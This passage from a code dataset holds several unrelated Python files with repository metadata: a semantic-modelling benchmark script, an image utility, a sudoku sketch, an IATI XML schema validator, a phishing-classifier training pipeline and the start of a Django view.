= empty_ssd.update(new_json, sn.datasets, sn.ontologies)\n ssds.append(sn.ssds.upload(ssd))\n # we remove the csv dataset\n os.remove(ds_f)\n\n\nif len(datasets) != len(ssds):\n print(\"Something went wrong. 
Failed to read all datasets and ssds.\")\n exit()\n\ninput(\"Press enter to continue...\")\nprint(\"*********** Datasets and semantic source descriptions from museum benchmark\")\nfor i, ds in enumerate(datasets):\n print(i, \": dataset=\", ds, \"; ssd=\", ssds[i])\nprint()\n\n# =======================\n#\n# Step 4: Specify training and test samples\n#\n# =======================\ntrain_sample = []\ntest_sample = []\n\n# s16 will be test\nfor i, ds in enumerate(datasets):\n if \"s07\" in ds.filename:\n test_sample.append(i)\n else:\n # if \"s07\" in ds.filename or \"s08\" in ds.filename:\n train_sample.append(i)\n\n# train_sample = train_sample[:5]\n\nprint(\"Indexes for training sample: \", train_sample)\nprint(\"Indexes for testing sample: \", test_sample)\n\n# =======================\n#\n# Step 5: Create octopus\n#\n# =======================\n\nocto_local = sn.Octopus(\n ssds=[ssds[i] for i in train_sample],\n ontologies=ontologies,\n name='octopus-without-s07',\n description='Testing example for places and companies',\n resampling_strategy=\"BaggingToMean\", # optional\n num_bags=10, # optional\n bag_size=30, # optional\n model_type=\"randomForest\",\n modeling_props={\n \"compatibleProperties\": True,\n \"ontologyAlignment\": True,\n \"addOntologyPaths\": True,\n \"mappingBranchingFactor\": 50,\n \"numCandidateMappings\": 10,\n \"topkSteinerTrees\": 50,\n \"multipleSameProperty\": True,\n \"confidenceWeight\": 1.0,\n \"coherenceWeight\": 1.0,\n \"sizeWeight\": 0.5,\n \"numSemanticTypes\": 10,\n \"thingNode\": False,\n \"nodeClosure\": True,\n \"propertiesDirect\": True,\n \"propertiesIndirect\": True,\n \"propertiesSubclass\": True,\n \"propertiesWithOnlyDomain\": True,\n \"propertiesWithOnlyRange\": True,\n \"propertiesWithoutDomainRange\": False,\n \"unknownThreshold\": 0.05\n },\n feature_config={\n \"activeFeatures\": [\n \"num-unique-vals\",\n \"prop-unique-vals\",\n \"prop-missing-vals\",\n \"ratio-alpha-chars\",\n \"prop-numerical-chars\",\n \"prop-whitespace-chars\",\n \"prop-entries-with-at-sign\",\n \"prop-entries-with-hyphen\",\n \"prop-range-format\",\n \"is-discrete\",\n \"entropy-for-discrete-values\",\n \"shannon-entropy\"\n ],\n \"activeFeatureGroups\": [\n \"char-dist-features\",\n \"inferred-data-type\",\n \"stats-of-text-length\",\n \"stats-of-numeric-type\"\n ,\"prop-instances-per-class-in-knearestneighbours\"\n ,\"mean-character-cosine-similarity-from-class-examples\"\n # ,\"min-editdistance-from-class-examples\"\n # ,\"min-wordnet-jcn-distance-from-class-examples\"\n # ,\"min-wordnet-lin-distance-from-class-examples\"\n ],\n \"featureExtractorParams\": [\n {\n \"name\": \"prop-instances-per-class-in-knearestneighbours\",\n \"num-neighbours\": 3\n }\n # , {\n # \"name\": \"min-editdistance-from-class-examples\",\n # \"max-comparisons-per-class\": 3\n # }, {\n # \"name\": \"min-wordnet-jcn-distance-from-class-examples\",\n # \"max-comparisons-per-class\": 3\n # }, {\n # \"name\": \"min-wordnet-lin-distance-from-class-examples\",\n # \"max-comparisons-per-class\": 3\n # }\n ]\n }\n)\n\n# add this to the endpoint...\nprint(\"Now we upload to the server\")\nocto = sn.octopii.upload(octo_local)\n\nprint(\"Uploaded octopus:\", octo)\n\n# =======================\n#\n# Step 6. 
Train\n#\n# =======================\n\nstart = time.time()\nprint()\nprint(\"Next we can train the Octopus\")\nprint(\"The initial state for {} is {}\".format(octo.id, octo.state))\nprint(\"Training...\")\nocto.train()\nprint(\"Done in: {}\".format(time.time() - start))\nprint(\"The final state for {} is {}\".format(octo.id, octo.state))\n\nif octo.state.status in {Status.ERROR}:\n print(\"Something went wrong. Failed to train the Octopus.\")\n exit()\n\n# =======================\n#\n# Step 7. Predict\n#\n# =======================\n\nstart = time.time()\npredicted = octo.predict(datasets[test_sample[0]])\nprint(\"Prediction done in: {}\".format(time.time() - start))\nprint(predicted)\n\nprint()\nprint(\"Showing ground truth...\")\n# ssds[test_sample[0]] is ground truth\nground_truth = ssds[test_sample[0]]\nground_truth.show(title='ground truth',\n outfile=os.path.join(tempfile.gettempdir(), 'ground_truth.png'))\ninput(\"Press enter to see predicted semantic models...\")\n\nprint(\"><><><><\")\nfor res in predicted:\n print(res)\n print()\n res.ssd.show()\n input(\"Press enter to continue...\")\nprint(\"><><><><\")\n\n# for p in predicted:\n# print(\"Predicted candidate rank\", p.score.rank)\n# print(\"Score:\")\n# p.score.show()\n# p.ssd.show()\n# input(\"Press any key to continue...\")\n\n# the best is number 0!\npredicted_ssd = predicted[0].ssd\n# predicted_ssd.unmapped_columns\nprint()\nprint(\"============Best recommendation=========\")\nprint(predicted_ssd)\n\nprint(\"Mappings:\")\nfor map in predicted_ssd.mappings.items():\n print(map)\n\nprint(\"Unmapped columns:\")\nprint(predicted_ssd.unmapped_columns)\nprint()\n\nprint(\"Columns: \")\nfor col in predicted_ssd.columns:\n print(\"name={}, id={}\".format(col.name, col.id))\n\nprint()\nprint(predicted_ssd.json)\nprint()\npprint(predicted_ssd.json)\ninput(\"Press enter to continue...\")\n# =======================\n#\n# Step 8. 
Evaluate against ground truth\n#\n# =======================\n\n# ssds[test_sample[0]] is ground truth\nground_truth = ssds[test_sample[0]]\ncomparison = sn.ssds.compare(predicted_ssd, ground_truth, False, False)\npredicted_ssd.show(title=\"best recommendation: \\n\"+str(comparison),\n outfile=os.path.join(tempfile.gettempdir(), 'best_recommendation.png'))\n# ground_truth.show(title='ground truth',\n# outfile=os.path.join(tempfile.gettempdir(), 'ground_truth.png'))\nprint(\"================\")\n\ninput(\"Press enter to continue...\")\nfor i, pred in enumerate(predicted):\n comparison = sn.ssds.compare(pred.ssd, ssds[test_sample[0]], False, False)\n print(\"SsdResult({}) comparison: {}\".format(i,comparison))","repo_name":"NICTA/serene-python-client","sub_path":"doc/museum_benchmark.py","file_name":"museum_benchmark.py","file_ext":"py","file_size_in_byte":9299,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"73517769527","text":"import numpy as np\n\nfrom PIL import Image, ImageDraw\nfrom pathlib import Path\nfrom cairosvg import svg2png\nfrom icecream import ic\n\n\nclass ImgUtil:\n def __init__(self, verbose=False):\n self.verbose = verbose\n\n @staticmethod\n def circle_bbox(x, y, r):\n return list(map(int, [x-r, y-r, x+r, y+r]))\n\n def draw_circle(self, img, x, y, r, outline=None, fill=None, width=1):\n draw = ImageDraw.Draw(img)\n bbox = ImgUtil.circle_bbox(x, y, r)\n draw.ellipse(bbox, outline=outline, fill=fill, width=width)\n if self.verbose:\n ic(f'Ellipse drawn with bounding box {bbox}')\n\n def svg2img(self, f, sz=4000):\n \"\"\"\n Converts an SVG file to a pillow image\n \"\"\"\n fnm = Path(f).with_suffix('') # Remove file ext.\n sz = int(sz)\n fnm_png = f'{fnm}, {sz}.png'\n\n if not Path(fnm_png).exists():\n s = open(f, 'rb').read()\n svg2png(bytestring=s, parent_width=sz, parent_height=sz, write_to=fnm_png)\n if self.verbose:\n ic(f'SVG converted to PNG file: {fnm_png}')\n else:\n if self.verbose:\n ic(f'Using converted PNG file: {fnm_png}')\n\n im = Image.open(fnm_png)\n w, h = im.size\n if w > sz or h > sz:\n im.thumbnail((sz, sz), Image.ANTIALIAS)\n im.save(fnm_png)\n return im\n\n def refill_color(\n self,\n img,\n c_ori: tuple[int, int, int],\n c_new: tuple[int, int, int]\n ):\n arr = np.array(img)\n r, g, b, a = arr.T\n r_o, g_o, b_o = c_ori\n area = (r == r_o) & (b == b_o) & (g == g_o)\n arr[..., :-1][area.T] = c_new\n\n img_new = Image.fromarray(arr)\n if self.verbose:\n ic(f'Image filled with {c_ori} converted to {c_new}')\n return img_new\n\n @staticmethod\n def lightness(c, f):\n \"\"\"\n :return: Original color in a different shade/tint\n\n Positive `f` for tint, negative for shade\n \"\"\"\n if f == 0:\n return c\n else:\n c_new = tuple(map(\n (lambda x: x + (255 - x) * f) if f > 0 else (lambda x: x * (1 + f)),\n c\n ))\n return tuple(map(int, c_new))\n\n def sweep_alpha(self, img, f):\n arr = np.array(img)\n r, g, b, a = arr.T\n arr[..., -1] = a.T * f\n img_new = Image.fromarray(arr)\n if self.verbose:\n ic(f'Image alpha channel multiplied by {f}')\n return img_new\n","repo_name":"StefanHeng/Image-Cloud-Generator","sub_path":"img_util.py","file_name":"img_util.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"34925342589","text":"# This script shows the bases for the algorithm\n\nimport numpy as np\nimport itertools\n\na = [\n [0, 3, 5, 2, 9, 0, 8, 6, 4],\n [0, 8, 2, 4, 1, 0, 7, 0, 3],\n [7, 6, 4, 
3, 8, 0, 0, 9, 0],\n    [2, 1, 8, 7, 3, 9, 0, 4, 0],\n    [0, 0, 0, 8, 0, 4, 2, 3, 0],\n    [0, 4, 3, 0, 5, 2, 9, 7, 0],\n    [4, 0, 6, 5, 7, 1, 0, 0, 9],\n    [3, 5, 9, 0, 2, 8, 4, 1, 7],\n    [8, 0, 0, 9, 0, 0, 5, 2, 6],\n]\n\n\nnpArray = np.array(a)\n\n\n# Get all the indices where the zeros are present\nb = {j: {k: np.arange(9) for k in np.where(i == 0)[0].tolist()} for i, j in zip(\n    npArray, np.arange(npArray.shape[0]))}\n\n# To get elements from row\n# Remove duplicates\n\n# you need to add the 3x3 groups\nd = {}\nfor i, k in zip(range(0, 10, 3), range(3, 10, 3)):\n    for j, h in zip(range(0, 10, 3), range(3, 10, 3)):\n        d[(range(i, k), range(j, h))] = np.reshape(\n            npArray[i:k, j:h], npArray[i:k, j:h].size)\n\n\ndef group(row, element):\n    for i, j in d.items():\n        if row in i[0] and element in i[1]:\n            return j\n\n# Candidate values for an empty cell: np.setdiff1d returns the sorted, unique\n# values in ar1 that are not in ar2 (here, everything already placed in the\n# cell's row, column and 3x3 group).\nnp.setdiff1d(b[0][0], np.concatenate([npArray[0], npArray[:, 0], group(0, 0)]))\nnp.setdiff1d(b[7][3], np.concatenate([npArray[7], npArray[:, 3], group(7, 3)]))\n# This creates the structure that will be needed to find the results\n\n# print(a)\n# print(npArray)\n\n# The problem with this algorithm is that when a medium or hard sudoku\n# puzzle is given an infinite loop is started.\n# tree copy and self.decisionTree are the same as no more\n# possibilities can be reduced\n#\n# # Returns the index and the number of missing elements in the row for all the rows\n# b = [(index,len(elements)) for index, elements in a.items()]\n#\n# (i[0] for i in sorted(b,key=operator.itemgetter(1)))\n\n\n# Also take into consideration the 3 columns and rows\n# for i,j in a.items():\n#     a[i] q[]\n#\n#\n# >>> np.setdiff1d(a.decisionTree[1][8],itertools.chain(a.decisionTree[0][6], a.decisionTree[0][8],a.decisionTree[1][7],a.decisionTree[2][7]))\n#array([2])\n","repo_name":"josecolella/Insight-Sudoku","sub_path":"src/algorithm-rough.py","file_name":"algorithm-rough.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"27892490991","text":"from os.path import exists, join\nimport re\n\nfrom lxml import etree as ET\n\nfrom ..utils.exceptions import SchemaNotFoundError\nfrom ..utils.validator import Validator, ValidationError\nfrom ..utils.config import CONFIG\n\n\nclass XSDValidationError(ValidationError):\n    def __init__(self, error, filetype, version):\n        super(XSDValidationError, self).__init__(\n            error.message, error.line, error.column, error.path)\n\n        self.filetype = filetype\n        self.version = version\n\n    def _get_element(self):\n        el_match = re.match(r\"Element '([^']+)'\", self.original_msg)\n        return el_match.group(1) if el_match else None\n\n    def _get_attribute(self):\n        attr_match = re.search(r\" attribute '([^']+)'\", self.original_msg)\n        return attr_match.group(1) if attr_match else None\n\n    def _get_expecteds(self):\n        expected_match = re.search(r'\\( ([^)]+) \\)', self.original_msg)\n        if not expected_match:\n            return []\n        return [ex for ex in expected_match.group(1).split(', ')\n                if not ex.startswith('##')]\n\n    def _get_value(self):\n        value_re = re.compile(r\"Element '[^']+'(?:, attribute \" +\n                              r\"'[^']+')?: '([^']*)'\")\n        value_match = value_re.match(self.original_msg)\n        return value_match.group(1) if value_match else None\n\n    @property\n    def location(self):\n        if self.column != 0:\n            return 'Line {}, column {}.'.format(self.line, self.column)\n        return 'Line {}.'.format(self.line)\n\n    @property\n    def url(self):\n        if 
self.version in ['1.01', '1.02', '1.03']:\n # it's difficult to generate a URL for these\n return None\n path = re.sub(r'\\[[^\\]]+\\]', '', self.path)\n tmpl = 'http://reference.iatistandard.org/{version}/' + \\\n '{filetype}-standard{path}/'\n version_str = self.version.replace('.', '')\n return tmpl.format(version=version_str, path=path,\n filetype=self.filetype)\n\n @property\n def message(self):\n tmpl = '{summary}\\n\\n{details}\\n\\n{location}'\n msg = tmpl.format(summary=self.summary, details=self.details,\n location=self.location)\n url = self.url\n if url:\n msg += '\\n\\nSee: {url}'.format(url=url)\n return msg\n\n\nclass XSDDecimalTypeError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDDecimalTypeError, self).__init__(error, filetype, version)\n\n value = self._get_value()\n\n # https://www.w3.org/TR/xmlschema-2/#decimal\n self.summary = 'An invalid decimal value is used.'\n if value is None:\n details = ''\n elif value == '':\n details = 'The value \"{value}\" is empty, which means ' + \\\n 'it isn\\'t a valid decimal value.'\n elif not any(map(lambda x: x.isdigit(), value)):\n details = 'The value \"{value}\" contains no digits at all, ' + \\\n 'which means it isn\\'t a valid decimal value.'\n elif ',' in value:\n details = 'The value \"{value}\" includes a comma, ' + \\\n 'which isn\\'t permitted.'\n elif '\\x9c' in value:\n details = 'The value \"{value}\" includes the special ' + \\\n 'character \"\\\\x9c\".'\n elif len(list(filter(lambda x: x.isdigit(), value))) > 18:\n details = 'The value \"{value}\" contains too many digits! ' + \\\n 'It sounds ridiculous, but XML has a hard limit ' + \\\n 'on the number of digits a decimal may contain.'\n else:\n details = 'The value \"{value}\" is not a valid decimal.'\n self.details = details.format(value=value)\n\n\nclass XSDDateTimeTypeError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDDateTimeTypeError, self).__init__(error, filetype, version)\n\n value = self._get_value()\n\n # https://www.iso.org/iso-8601-date-and-time-format.html\n self.summary = 'An invalid \"dateTime\" is used.'\n details = 'Date and time values must use a very particular ' + \\\n 'format, described by ISO 8601.'\n\n if value is not None:\n details += ' The following value does not adhere to that ' + \\\n 'format: \"{value}\".'\n\n self.details = details.format(value=value)\n\n\nclass XSDDateTypeError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDDateTypeError, self).__init__(error, filetype, version)\n\n value = self._get_value()\n\n # https://www.w3.org/TR/xmlschema-2/#date\n self.summary = 'An invalid date is used.'\n details = 'Dates must use a specific format (YYYY-MM-DD).'\n\n if value is not None:\n details += ' The following value does not fit that format: ' + \\\n '\"{value}\".'\n self.details = details.format(value=value)\n\n\nclass XSDBooleanTypeError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDBooleanTypeError, self).__init__(error, filetype, version)\n\n value = self._get_value()\n attr = self._get_attribute()\n\n # https://www.w3.org/TR/xmlschema-2/#boolean\n self.summary = 'An invalid boolean (true or false) value ' + \\\n 'is used.'\n details = 'The '\n if attr is not None:\n details += '\"{attr_name}\" attribute of the '\n details += '\"{el_name}\" element must be either \"true\", ' + \\\n '\"false\", \"1\" or \"0\". 
No other values are ' + \\\n                  'allowed.'\n\n        if value is not None:\n            if value.lower() in ['true', 'false']:\n                details += ' The value used is \"{value}\", which is ' + \\\n                           'invalid because it is not all lowercase.'\n            else:\n                details += ' The value used instead is \"{value}\".'\n\n        self.details = details.format(el_name=self._get_element(),\n                                      attr_name=attr, value=value)\n\n\nclass XSDURITypeError(XSDValidationError):\n    def __init__(self, error, filetype, version):\n        super(XSDURITypeError, self).__init__(error, filetype, version)\n\n        value = self._get_value()\n\n        # https://www.w3.org/TR/xmlschema-2/#anyURI\n        self.summary = 'An invalid link to a document or website ' + \\\n                       'is provided.'\n        details = 'The following URL is used in the data, ' + \\\n                  'but is not valid: \"{url}\".'\n        self.details = details.format(url=value)\n\n\nclass XSDNameTokenTypeError(XSDValidationError):\n    def __init__(self, error, filetype, version):\n        super(XSDNameTokenTypeError, self).__init__(error, filetype, version)\n\n        value = self._get_value()\n        attr = self._get_attribute()\n\n        # https://www.w3.org/TR/xmlschema-2/#NMTOKEN\n        self.summary = 'An invalid reference to another IATI ' + \\\n                       'element is used.'\n        details = 'This is a bit unusual... The '\n        if attr is not None:\n            details += '\"{attr_name}\" attribute of the '\n\n        details += '\"{el_name}\" element must reference another ' + \\\n                   'IATI element.'\n\n        if value is not None:\n            details += ' However, the value provided (\"{value}\") ' + \\\n                       'is not a valid IATI element name.'\n        self.details = details.format(el_name=self._get_element(),\n                                      attr_name=attr, value=value)\n\n\nclass XSDTextNotAllowedError(XSDValidationError):\n    def __init__(self, error, filetype, version):\n        super(XSDTextNotAllowedError, self).__init__(error, filetype, version)\n\n        self.summary = 'Text found where there shouldn\\'t be any.'\n        details = 'The \"{el_name}\" element is not allowed to contain ' + \\\n                  'any text. Either this text was added in error, or ' + \\\n                  'should be included in an attribute or a ' + \\\n                  'child element.'\n        self.details = details.format(el_name=self._get_element())\n\n\nclass XSDUnknownAttributeError(XSDValidationError):\n    def __init__(self, error, filetype, version):\n        super(XSDUnknownAttributeError, self).__init__(\n            error, filetype, version)\n\n        self.summary = 'An incorrect attribute is present.'\n        details = 'The \"{el_name}\" element includes an attribute ' + \\\n                  '\"{attr_name}\". This attribute should not be ' + \\\n                  'present here.'\n        self.details = details.format(el_name=self._get_element(),\n                                      attr_name=self._get_attribute())\n\n\nclass XSDMissingAttributeError(XSDValidationError):\n    def __init__(self, error, filetype, version):\n        super(XSDMissingAttributeError, self).__init__(\n            error, filetype, version)\n\n        self.summary = 'A required attribute is missing.'\n        details = 'The \"{el_name}\" element must include a ' + \\\n                  '\"{attr_name}\" attribute. 
This is missing.'\n self.details = details.format(el_name=self._get_element(),\n attr_name=self._get_attribute())\n\n\nclass XSDUnexpectedElementError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDUnexpectedElementError, self).__init__(\n error, filetype, version)\n\n self.summary = 'An unexpected element was found.'\n expected = self._get_expecteds()\n if expected == []:\n expected_str = 'a different element'\n elif len(expected) == 1:\n expected_str = '\"{}\"'.format(expected[0])\n elif len(expected) == 2:\n expected_str = 'either \"{}\" or \"{}\"'.format(*expected)\n else:\n expected_str = 'one of \"{}\" or \"{}\"'.format(\n '\", \"'.join(expected[:-1]), expected[-1])\n\n if version.startswith('2'):\n details = 'In IATI v{version}, the order of elements ' + \\\n 'is important. It looks like that might be ' + \\\n 'the problem here. Specifically, ' + \\\n '\"{el_name}\" is present, but ' + \\\n '{expected} is expected.'\n else:\n details = 'The element \"{el_name}\" is present, but ' + \\\n '{expected} is expected.'\n self.details = details.format(version=version,\n expected=expected_str,\n el_name=self._get_element())\n\n\nclass XSDMissingElementError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDMissingElementError, self).__init__(error, filetype, version)\n\n expected = self._get_expecteds()\n if expected == []:\n expected_str = 'a different element'\n elif len(expected) == 1:\n expected_str = '\"{}\"'.format(expected[0])\n else:\n expected_str = '\"{}\" and \"{}\"'.format(\n '\", \"'.join(expected[:-1]), expected[-1])\n\n if len(expected) > 1:\n self.summary = 'Some required elements are missing.'\n details = 'The \"{el_name}\" element expects some child ' + \\\n 'elements, but these are missing. ' + \\\n 'Specifically, {expected} are missing ' + \\\n 'but should be present.'\n else:\n self.summary = 'A required element is missing.'\n details = 'The \"{el_name}\" element expects a child ' + \\\n 'element, but this is missing. ' + \\\n 'Specifically, {expected} is missing ' + \\\n 'but should be present.'\n self.details = details.format(expected=expected_str,\n el_name=self._get_element())\n\n\nclass XSDBadRootNodeError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDBadRootNodeError, self).__init__(error, filetype, version)\n\n el_name = self._get_element()\n\n self.summary = 'This doesn\\'t look like an IATI XML dataset.'\n if 'microsoft.com' in el_name:\n details = 'It looks like this might be a Microsoft Office ' + \\\n 'file, rather than an IATI XML dataset.'\n self.path = None\n else:\n details = 'The root node of the dataset should be either ' + \\\n '\"iati-organisations\" or \"iati-activities\". ' + \\\n 'In this case, it is \"{el_name}\". That\\'s a problem.'\n self.details = details.format(el_name=el_name)\n\n\nclass XSDValidator(Validator):\n def __init__(self, is_valid, errors, filetype, version):\n super(XSDValidator, self).__init__(is_valid, errors)\n\n self.filetype = filetype\n self.version = version\n\n @staticmethod\n def _get_error_class(ref, message):\n err_class = {\n 1843: XSDTextNotAllowedError,\n 1866: XSDUnknownAttributeError,\n 1867: XSDUnknownAttributeError,\n 1868: XSDMissingAttributeError,\n 1845: XSDBadRootNodeError,\n }.get(ref)\n\n if not err_class:\n if ref == 1871:\n if 'This element is not expected.' 
in message:\n err_class = XSDUnexpectedElementError\n elif 'Missing child element(s)' in message:\n err_class = XSDMissingElementError\n elif ref == 1824:\n if 'atomic type \\'xs:decimal\\'' in message:\n err_class = XSDDecimalTypeError\n elif 'atomic type \\'xs:dateTime\\'' in message:\n err_class = XSDDateTimeTypeError\n elif 'atomic type \\'xs:date\\'' in message:\n err_class = XSDDateTypeError\n elif 'atomic type \\'xs:boolean\\'' in message:\n err_class = XSDBooleanTypeError\n elif 'atomic type \\'xs:anyURI\\'' in message:\n err_class = XSDURITypeError\n elif 'atomic type \\'xs:NMTOKEN\\'' in message:\n err_class = XSDNameTokenTypeError\n\n if not err_class:\n # Default: unknown schema error\n err_class = XSDValidationError\n\n return err_class\n\n @property\n def errors(self):\n error_list = []\n for error in self._errors:\n xsd_error_class = self._get_error_class(error.type,\n error.message)\n xsd_error = xsd_error_class(error, self.filetype,\n self.version)\n error_list.append(xsd_error)\n return error_list\n\n @property\n def error_summary(self):\n error_dict = {}\n for error in self._errors:\n xsd_error_class = self._get_error_class(error.type,\n error.message)\n error_type = xsd_error_class.__name__\n if error_type not in error_dict:\n xsd_error = xsd_error_class(error, self.filetype,\n self.version)\n error_dict[error_type] = [xsd_error, 1]\n else:\n error_dict[error_type][1] += 1\n return list(error_dict.values())\n\n\nclass XSDSchema(object):\n def __init__(self, filetype, version):\n self.filetype = filetype\n self.version = version\n\n schema = {\n 'activity': 'iati-activities-schema.xsd',\n 'organisation': 'iati-organisations-schema.xsd',\n }.get(filetype)\n\n if filetype is None:\n msg = 'Couldn\\'t discern the filetype (activity or ' + \\\n 'organisation) for this dataset, so couldn\\'t ' + \\\n 'construct a schema.'\n raise SchemaNotFoundError(msg)\n elif schema is None:\n msg = 'Invalid filetype \"{filetype}\" was provided, ' + \\\n 'so couldn\\'t construct a schema.'\n msg = msg.format(filetype=filetype)\n raise SchemaNotFoundError(msg)\n elif version is None:\n msg = 'No version was provided, ' + \\\n 'so couldn\\'t construct a schema.'\n raise SchemaNotFoundError(msg)\n\n self.schema_path = join(CONFIG['paths']['standard'], 'schemas',\n version.replace('.', ''), schema)\n\n if not exists(self.schema_path):\n msg = 'No {filetype} schema found for IATI version \"{version}\".'\n msg = msg.format(filetype=filetype, version=version)\n raise SchemaNotFoundError(msg)\n\n def __repr__(self):\n return '<{} ({} {})>'.format(self.__class__.__name__,\n self.filetype, self.version)\n\n def validate(self, etree):\n schema = ET.XMLSchema(ET.parse(self.schema_path))\n is_valid = schema.validate(etree)\n return XSDValidator(is_valid, schema.error_log,\n self.filetype, self.version)\n","repo_name":"codeforIATI/iatikit","sub_path":"iatikit/standard/xsd_schema.py","file_name":"xsd_schema.py","file_ext":"py","file_size_in_byte":17111,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"18984096043","text":"import sys\nimport os\n\nfrom phising.components.data_ingestion import DataIngestion\nfrom phising.components.data_transformation import DataTransformation\nfrom phising.components.data_validation import DataValidation\nfrom phising.components.model_evaluation import ModelEvaluation\nfrom phising.components.model_pusher import ModelPusher\nfrom phising.components.model_trainer import ModelTrainer\nfrom 
phising.entity.artifact_entity import (\n DataIngestionArtifact,\n DataTransformationArtifact,\n DataValidationArtifact,\n ModelEvaluationArtifact,\n ModelPusherArtifact,\n ModelTrainerArtifact,\n)\nfrom phising.entity.config_entity import (\n DataIngestionConfig,\n DataTransformationConfig,\n DataValidationConfig,\n ModelEvaluationConfig,\n ModelPusherConfig,\n ModelTrainerConfig,\n TrainingPipelineConfig,\n)\nfrom phising.exception import PhisingException\n\n\nclass TrainPipeline:\n is_pipeline_running = False\n\n def __init__(self):\n self.training_pipeline_config: TrainingPipelineConfig = TrainingPipelineConfig()\n\n def start_data_ingestion(self) -> DataIngestionArtifact:\n try:\n self.data_ingestion_config: DataIngestionConfig = DataIngestionConfig(\n training_pipeline_config=self.training_pipeline_config\n )\n\n data_ingestion: DataIngestion = DataIngestion(\n data_ingestion_config=self.data_ingestion_config\n )\n\n data_ingestion_artifact: DataIngestionArtifact = (\n data_ingestion.initiate_data_ingestion()\n )\n\n return data_ingestion_artifact\n\n except Exception as e:\n raise PhisingException(e, sys)\n\n def start_data_validation(\n self, data_ingestion_artifact: DataIngestionArtifact\n ) -> DataValidationArtifact:\n try:\n self.data_validation_config: DataValidationConfig = DataValidationConfig(\n training_pipeline_config=self.training_pipeline_config\n )\n\n data_validation: DataValidation = DataValidation(\n data_ingestion_artifact=data_ingestion_artifact,\n data_validation_config=self.data_validation_config,\n )\n\n data_validation_artifact: DataValidationArtifact = (\n data_validation.initiate_data_validation()\n )\n\n return data_validation_artifact\n\n except Exception as e:\n raise PhisingException(e, sys)\n\n def start_data_transformation(\n self, data_validation_artifact: DataValidationArtifact\n ) -> DataTransformationArtifact:\n try:\n self.data_transformation_config: DataTransformationConfig = (\n DataTransformationConfig(\n training_pipeline_config=self.training_pipeline_config\n )\n )\n\n data_transformation: DataTransformation = DataTransformation(\n data_validation_artifact=data_validation_artifact,\n data_transformation_config=self.data_transformation_config,\n )\n\n data_transformation_artifact: DataTransformationArtifact = (\n data_transformation.initiate_data_transformation()\n )\n\n return data_transformation_artifact\n\n except Exception as e:\n raise PhisingException(e, sys)\n\n def start_model_trainer(\n self, data_transformation_artifact: DataTransformationArtifact\n ) -> ModelTrainerArtifact:\n try:\n self.model_trainer_config: ModelTrainerConfig = ModelTrainerConfig(\n training_pipeline_config=self.training_pipeline_config\n )\n\n model_trainer = ModelTrainer(\n data_transformation_artifact=data_transformation_artifact,\n model_trainer_config=self.model_trainer_config,\n )\n\n model_trainer_artifact = model_trainer.initiate_model_trainer()\n\n return model_trainer_artifact\n\n except Exception as e:\n raise PhisingException(e, sys)\n\n def start_model_evaluation(\n self,\n data_validation_artifact: DataValidationArtifact,\n model_trainer_artifact: ModelTrainerArtifact,\n ) -> ModelEvaluationArtifact:\n try:\n self.model_eval_config: ModelEvaluationConfig = ModelEvaluationConfig()\n\n model_evaluation = ModelEvaluation(\n model_eval_config=self.model_eval_config,\n data_validation_artifact=data_validation_artifact,\n model_trainer_artifact=model_trainer_artifact,\n )\n\n model_evaluation_artifact = model_evaluation.initiate_model_evaluation()\n\n 
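            # run_pipeline consumes this artifact and feeds it to the model pusher step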
return model_evaluation_artifact\n\n        except Exception as e:\n            raise PhisingException(e, sys)\n\n    def start_model_pusher(self, model_evaluation_artifact: ModelEvaluationArtifact):\n        try:\n            self.model_pusher_config: ModelPusherConfig = ModelPusherConfig()\n\n            model_pusher = ModelPusher(\n                model_evaluation_artifact=model_evaluation_artifact,\n                model_pusher_config=self.model_pusher_config,\n            )\n\n            model_pusher_artifact = model_pusher.initiate_model_pusher()\n\n            return model_pusher_artifact\n\n        except Exception as e:\n            raise PhisingException(e, sys)\n\n    def run_pipeline(self):\n        try:\n            TrainPipeline.is_pipeline_running = True\n\n            data_ingestion_artifact: DataIngestionArtifact = self.start_data_ingestion()\n\n            data_validation_artifact: DataValidationArtifact = (\n                self.start_data_validation(\n                    data_ingestion_artifact=data_ingestion_artifact\n                )\n            )\n\n            data_transformation_artifact: DataTransformationArtifact = (\n                self.start_data_transformation(\n                    data_validation_artifact=data_validation_artifact\n                )\n            )\n\n            model_trainer_artifact: ModelTrainerArtifact = self.start_model_trainer(\n                data_transformation_artifact=data_transformation_artifact\n            )\n\n            model_evaluation_artifact: ModelEvaluationArtifact = (\n                self.start_model_evaluation(\n                    data_validation_artifact=data_validation_artifact,\n                    model_trainer_artifact=model_trainer_artifact,\n                )\n            )\n\n            model_pusher_artifact: ModelPusherArtifact = self.start_model_pusher(\n                model_evaluation_artifact=model_evaluation_artifact\n            )\n\n        except Exception as e:\n            raise PhisingException(e, sys)\n","repo_name":"sethusaim/phising-classifaction","sub_path":"phising/pipeline/training_pipeline.py","file_name":"training_pipeline.py","file_ext":"py","file_size_in_byte":6668,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"39318225575","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Teacher\nfrom django.utils.crypto import get_random_string\n\n\n# Create your views here.\ndef view_teachers(request, pk=None) -> render:\n    if 'create' in request.path:\n        kravtz = Teacher.objects.filter(first_name='Кравец')\n        if not kravtz:\n            Teacher.objects.create(first_name='Кравец',\n                                   second_name='Боб',\n                                   birth_day='2000-12-15',\n                                   email='bob@kravetx.eau',\n                                   phone='+998901002030'\n                                   )\n        else:\n            teacher_tmp = Teacher.objects.filter(first_name='Кравец').first()\n            teacher_tmp.second_name = get_random_string(length=10, allowed_chars='АБВГДЕЁЖЗИКЛМНОПРСТУФХЧШЩЭЮЯ')\n            teacher_tmp.email = get_random_string(length=6,\n                                                  